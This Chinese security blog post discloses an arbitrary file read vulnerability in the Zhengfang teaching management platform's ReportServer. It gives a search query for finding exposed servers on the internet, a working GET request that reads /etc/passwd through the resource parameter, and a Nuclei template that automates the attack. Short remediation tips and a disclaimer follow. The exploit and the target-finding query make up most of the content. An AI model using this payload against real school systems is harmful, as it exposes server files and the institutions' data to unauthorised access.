【1day】正方教学管理信息服务平台ReportServer存在任意文件读取

原创 十二 十二主神 2024-03-20 21:09

重要通知

师傅们，动动小手指，设个星标，灰常感谢

漏洞描述

正方
教学管理信息服务平台以培养、运行、保障、监控为主线，实现教务工作事务性管理和战略性管理的相互叠加，满足学校培养过程管理、教学质量检查、教学工作评价、教学业绩评价、教学改革发展等战略性需求。正方教学管理信息服务平台ReportServer存在任意文件读取漏洞，攻击者可通过该漏洞获取服务器上敏感文件内容。

资产测绘

body="正方软件股份有限公司" && title="教学管理信息服务平台"

漏洞复现

部分界面如下

POC

GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true

Nuclei脚本

id: zfjxgl-reportserver-anyfileread

info:
  name: zfjxgl-reportserver-anyfileread
  author: xxxx
  severity: high

http:
  - raw:
    - | 
      GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1
      Host: {{Hostname}}
      Content-Type: text/plain
      Connection: close

    matchers:
      - type: dsl
        dsl:
         - status_code==200 && contains_all(body,"root")

修复建议

1
、请联系厂商进行修复或升级到安全版本。

2、如非必要，禁止公网访问该系统。

3、设置白名单访问。

免责声明：   本文章仅做网络安全技术研究使用！严禁用于非法犯罪行为，请严格遵守国家法律法规；请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。公众号发表的一切文章如有侵权烦请私信联系告知，我们会立即删除并对您表达最诚挚的歉意！感谢您的理解！

交流群